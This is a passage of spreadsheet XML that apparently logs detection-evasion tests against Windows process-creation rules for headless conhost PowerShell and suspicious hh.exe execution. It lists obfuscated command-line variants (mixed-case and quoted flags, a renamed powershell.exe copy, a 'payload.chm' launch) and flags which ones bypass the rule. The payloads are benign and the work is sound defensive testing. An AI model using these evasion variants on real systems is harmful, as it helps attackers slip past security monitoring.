      <c r="A1746" s="43" t="n"/>
      <c r="B1746" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1746" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1746" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1746" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F1746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1746" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1746" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1746" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1746" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1746" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1747" ht="15.75" customHeight="1" s="42">
      <c r="A1747" s="43" t="n"/>
      <c r="B1747" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1747" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1747" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1747" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F1747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1747" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1747" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1747" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1747" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1747" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1748" ht="15.75" customHeight="1" s="42">
      <c r="A1748" s="43" t="n"/>
      <c r="B1748" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1748" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1748" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1748" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F1748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1748" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1748" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1748" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1748" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1748" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1749" ht="15.75" customHeight="1" s="42">
      <c r="A1749" s="43" t="n"/>
      <c r="B1749" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1749" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1749" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1749" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1749" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1749" s="44" t="n"/>
      <c r="J1749" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1749" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1750" ht="15.75" customHeight="1" s="42">
      <c r="A1750" s="43" t="n"/>
      <c r="B1750" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1750" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1750" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1750" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1750" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1750" s="44" t="n"/>
      <c r="J1750" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1750" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1751" ht="15.75" customHeight="1" s="42">
      <c r="A1751" s="43" t="n"/>
      <c r="B1751" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1751" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1751" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1751" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1751" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1751" s="44" t="n"/>
      <c r="J1751" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1751" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1752" ht="15.75" customHeight="1" s="42">
      <c r="A1752" s="43" t="n"/>
      <c r="B1752" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1752" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1752" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1752" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdLEss pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1752" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1752" s="44" t="n"/>
      <c r="J1752" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1752" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1753" ht="15.75" customHeight="1" s="42">
      <c r="A1753" s="43" t="n"/>
      <c r="B1753" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1753" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1753" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1753" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1753" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1753" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1753" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1753" s="44" t="n"/>
      <c r="J1753" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1753" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1754" ht="15.75" customHeight="1" s="42">
      <c r="A1754" s="43" t="n"/>
      <c r="B1754" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1754" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1754" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1754" s="44" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1754" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1754" s="43" t="n"/>
      <c r="J1754" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1754" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1755" ht="15.75" customHeight="1" s="42">
      <c r="A1755" s="43" t="n"/>
      <c r="B1755" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1755" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1755" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1755" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1755" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1755" s="43" t="n"/>
      <c r="J1755" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1755" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1756" ht="15.75" customHeight="1" s="42">
      <c r="A1756" s="43" t="n"/>
      <c r="B1756" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1756" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1756" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1756" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlESs pwsh.exe -cOmMand "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1756" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1756" s="44" t="n"/>
      <c r="J1756" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1756" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1757" ht="15.75" customHeight="1" s="42">
      <c r="A1757" s="43" t="n"/>
      <c r="B1757" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1757" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1757" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1757" s="44" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1757" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1757" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1757" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1757" s="44" t="n"/>
      <c r="J1757" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1757" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1758" ht="15.75" customHeight="1" s="42">
      <c r="A1758" s="43" t="n"/>
      <c r="B1758" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1758" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1758" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1758" s="44" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmmAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1758" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1758" s="44" t="n"/>
      <c r="J1758" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1758" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1759" ht="15.75" customHeight="1" s="42">
      <c r="A1759" s="43" t="n"/>
      <c r="B1759" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1759" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1759" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1759" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --headless C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1759" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1759" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1759" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1759" s="4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1759" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1759" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1760" ht="15.75" customHeight="1" s="42">
      <c r="A1760" s="43" t="n"/>
      <c r="B1760" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1760" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1760" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1760" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe -"-headless" C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1760" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1760" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1760" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1760" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1760" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1760" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1761" ht="15.75" customHeight="1" s="42">
      <c r="A1761" s="43" t="n"/>
      <c r="B1761" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1761" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1761" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1761" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEADlEsS C:\Temp\sys.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1761" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1761" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1761" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1761" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1761" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1761" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1762" ht="15.75" customHeight="1" s="42">
      <c r="A1762" s="43" t="n"/>
      <c r="B1762" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1762" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1762" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1762" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe /"-headless" C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1762" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1762" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1762" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1762" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1762" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1763" ht="15.75" customHeight="1" s="42">
      <c r="A1763" s="43" t="n"/>
      <c r="B1763" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1763" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1763" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1763" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --HeADLeSS C:\Temp\sys.exe /"Command" "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1763" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1763" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1763" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1763" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1763" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1764" ht="15.75" customHeight="1" s="42">
      <c r="A1764" s="43" t="n"/>
      <c r="B1764" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1764" s="44" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1764" s="44" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1764" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\sys.exe &amp;&amp; conhost.exe --hEAdlESS C:\Temp\sys.exe -CommAnd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1764" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1764" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1764" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1764" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1764" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1765" ht="15.75" customHeight="1" s="42">
      <c r="A1765" s="43" t="n"/>
      <c r="B1765" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1765" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1765" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1765" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F1765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1765" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1765" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1765" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1765" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1765" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1766" ht="15.75" customHeight="1" s="42">
      <c r="A1766" s="43" t="n"/>
      <c r="B1766" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1766" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1766" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1766" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F1766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1766" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1766" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1766" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1766" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1766" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1767" ht="15.75" customHeight="1" s="42">
      <c r="A1767" s="43" t="n"/>
      <c r="B1767" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1767" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1767" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1767" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F1767" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1767" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1767" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I176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767" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1767" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1768" ht="15.75" customHeight="1" s="42">
      <c r="A1768" s="43" t="n"/>
      <c r="B1768" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1768" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1768" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1768" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F1768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1768" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1768" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1768" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1768" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1768" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1769" ht="15.75" customHeight="1" s="42">
      <c r="A1769" s="43" t="n"/>
      <c r="B1769" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1769" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1769" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1769" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F1769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1769" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1769" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1769" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1769" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1769" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1770" ht="15.75" customHeight="1" s="42">
      <c r="A1770" s="43" t="n"/>
      <c r="B1770" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1770" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1770" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1770" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1770" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1770" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1770" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1770" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1770" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1771" ht="15.75" customHeight="1" s="42">
      <c r="A1771" s="43" t="n"/>
      <c r="B1771" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1771" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1771" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1771" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1771" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1771" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1771" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J1771" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1771" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1772" ht="15.75" customHeight="1" s="42">
      <c r="A1772" s="43" t="n"/>
      <c r="B1772" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C1772" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D1772" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E1772" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F1772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1772" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1772" s="43" t="n"/>
      <c r="J1772" s="44" t="n">
